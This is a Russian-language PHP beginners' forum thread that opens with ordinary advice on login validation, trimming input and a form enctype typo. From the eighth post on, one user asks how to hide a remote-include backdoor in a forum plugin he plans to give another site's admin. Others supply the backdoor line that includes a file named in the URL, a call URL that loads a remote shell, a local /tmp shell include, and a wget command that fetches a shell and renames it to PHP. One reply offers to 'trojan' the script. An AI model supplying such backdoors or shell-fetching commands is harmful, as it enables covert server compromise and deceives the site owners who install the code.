[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    а зачем запрещять использовать какие либо символы в логине ... ?
     
    1 person likes this.
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Ну есть непечатаемые символы, да и пробелы в начале, в середине и в конце логина тоже не нужны (хотя их можно просто обрезать потом)
    ЗЫ Пишу скрипт регистрации для сервиса hashcracking.info, нужно продумать какие ники там будут возможны...
     
    #2482 -=lebed=-, 29 Mar 2008
    Last edited: 29 Mar 2008
  3. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    preg_match('#^\S+$#s',$str)
     
    #2483 Doom123, 29 Mar 2008
    Last edited: 29 Mar 2008
  4. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    //оффтоп

    До сих пор не могу понять почему многие кодеры в своих движках запрещают использовать русские буквы и спецсимволы. А вот пароли не запрещают делать из спецсимволов...парадокс.
    Если правильно обработать все входящие данные, то никакой опасности они представлять не будут :)
    мыло тоже не обязательно запрещать в верхнем регистре, просто потом опустить его в нижний функцией strtolower(), плюс прикрутить подтверждалку по е-мейлу, тада все олени, которые мыло пишут от балды прутся лесом...
    И ещё)) Многие делают регулярки, чтобы нельзя было в имени мыла писать только одни подчёркивания. А если у меня и на самом деле мыло [email protected] ? хехе
    Пробелы в конце тоже не страшно...пусть вводят хоть сто пробелов)) trim() в помощь.

    Спасибо за внимание :)
     
    3 people like this.
  5. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    Пароли как правило шифруются MD5, и в итоге неважно, какие символы в нём были изначально.

    Это не применимо к паролям, вдруг юзер хочет сделать себе пасс с пробелами в начале и в конце, а скрипт не предупреждая их удаляет. Итог - юзер, не зная об этом, не может залогиниться.
     
    1 person likes this.
  6. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    чёт не втыкаю в чём проблема=//

    PHP:
    <?php
    echo '<form engtype="multipart/form-data" method="post" action="image.php">
    <input type="file" name="image" /><br />
    <input type="submit" name="submit" /></form> '
    ;

    if(isset(
    $_POST['submit']))
    {
        if(!empty(
    $_FILES['image']))
        {
           
    #############
        
    }
        else
        {
            echo 
    'Пусто';
        }
    }

    выдаёт пусто....
    я уже полчаса туплю не могу вьехать в чём проблема...почему файл в массив не помещается?
     
  7. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    у тебя engtype, а надо enctype
     
    #2487 Scipio, 30 Mar 2008
    Last edited: 30 Mar 2008
  8. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    У меня есть php скрипт, мне в нем надо сделать что-то тиап уязвимости, т.е. я мог вызвать через этот скрипт шелл:
    например: www.site.com/script.php?shell=[shell-adress]
     
  9. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    так не идет...
    мне не надо чтобы скрипт постояно инклудил, а когда мне нужно, а то если переменная shell не задана, то вываливает ошибка.
     
  10. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    вставляешь в страницу вот это
    if(@$_GET["hack"] == "yes") include($_GET['file']);

    а вызываешь вот так

    http://site.ru/index.php?hack=yes&file=http://site.ru/shell.txt
     
    1 person likes this.
  11. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Warning: include() [function.include]: URL file-access is disabled in the server configuration

    Вот такую ошибку нельзя обойти или это только в конфигах меняется?
     
  12. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    это что при выключенном параметре, невозможен php-инклудинг?
    З.Ы. я этот скрипт хочу не себе поставить, поэтому я должен быть готов на все случаи жизни=), шелл я подсунуть не могу уж слишком он громоздкий, спалят...
     
    #2492 QZAR-X, 30 Mar 2008
    Last edited: 30 Mar 2008
  13. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    да невозможен и ничего ты несделаешь с удаленного сервера шел не приинклудишь а вот с того сервера котором ты находится должен смоч приинклудить попробуй с локального сервера шел приинклудить.
    Попробуй залить в папку /tmp шел а потом вставь в скрипт что то типо этого
    <?
    include ("/tmp/shell.txt")
    ?>
     
    #2493 heks, 30 Mar 2008
    Last edited: 30 Mar 2008
  14. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
    Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?



    А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
    index.php?hack=yes&upload=shell.php
     
    #2494 QZAR-X, 30 Mar 2008
    Last edited: 30 Mar 2008
  15. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12

    встрой туда что я тебе сказал и все будет возможно использовать можно будет какой либо качалкой залить с удаленного сайта шел примерно так сам точно незнаю скрипт в котором это было где то есть но я непомню где ;(
    wget http://site.ru/shell.txt;mv shell.txt shell.php но дира должна быть доступна для записи
     
  16. azote

    azote New Member

    Joined:
    28 Mar 2008
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Может поможет мне ктонить? А? Мой пост несколько страниц назад...
     
  17. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    сразу сказать на какой странице твой пост нельзя у лююдей траф не резиновый непроше юзать шел который скачивае или отправляет шел по почте ?
     
    #2497 heks, 30 Mar 2008
    Last edited: 30 Mar 2008
  18. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    аааа...блин...опечатался и сидел думал чё за хня.
    Скип и Воланд спасибо :)
    пойду убью себя ап стену =/
     
  19. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    ne короче такая тема нашел на сайте инклуд. инклудит страницу с другого сайта например страница php открывается как php а когда инклудишь txt открывается как txt что нить можно сделать с такой иньекцией
     
  20. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Так тебе надо скрипт протроянить? вот:
     
    1 person likes this.
Thread Status:
Not open for further replies.